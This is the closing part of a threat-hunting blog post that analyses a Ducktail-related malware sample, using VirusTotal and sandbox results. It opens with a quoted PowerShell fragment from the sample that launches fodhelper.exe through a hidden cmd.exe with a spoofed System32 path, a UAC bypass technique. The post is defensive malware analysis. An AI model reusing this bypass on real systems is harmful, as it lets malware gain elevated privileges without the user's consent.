Write-Host "Start Temp";
$command = "/c ""C:\Windows \System32\fodhelper.exe""";
Write-Host $command;
$cmdName = "cmd.exe";
Write-Host $cmdName;
$mtx_randomMutex= New-Object System.Threading.Mutex($false, "MyRandomMutex");
$mtx_randomMutex.WaitOne(0);
Start-Sleep -Seconds 1;
write-host "start process, wait stop";
Start-Process $cmdName -ArgumentList ($command) -WindowStyle Hidden;
Start-Sleep -Seconds 2;

In this sample, based on the VirusTotal results for the datatranfer.online domain, many conclusions can be drawn. One is that this file can be downloaded without the PowerShell user-agent, which allows it to be fetched from anywhere, for example by VirusTotal itself.

Here you can see the result.

As you will see, when VT treats something as a URL it does not handle it very well if the response is a file, as in this case, so in these situations I recommend analysing the body in the "details" section. In my case, since I had already submitted it, it appears as "go to analysis":

Virustotal information from URL

Now we have our file better analysed. I will leave you with a couple of details I was able to extract. In my case I downloaded the sandbox PCAP, which is only available in the paid version of VT, and I saw a network connection that is not visible to the naked eye (CAPE already tells us there is something there that it has not seen):

PCAP from virustotal CAPE sandbox

On the other hand, through the "files written" section I arrived at this. Could it be a coincidence? I will read you in the comments.

And finally, I think our payload is still doing its thing, stretching the chewing gum, spreading itself across different processes to complicate detection:

Here is an analysis by eSentire that covers another part of Ducktail, the one involving RDP Wrapper, a feature we have not seen in this analysis but which is common in some of the samples I have analysed.

Also, among the files related to this sample, a ransomware sample shows up, which, without going into the in-depth intelligence side, gives food for thought....

Happy Hunting!



Cristóbal Martínez

Creator of The Hunter's Framework, the best framework for Threat Hunting. Cyber Threat Hunter and cybersecurity technician and consultant.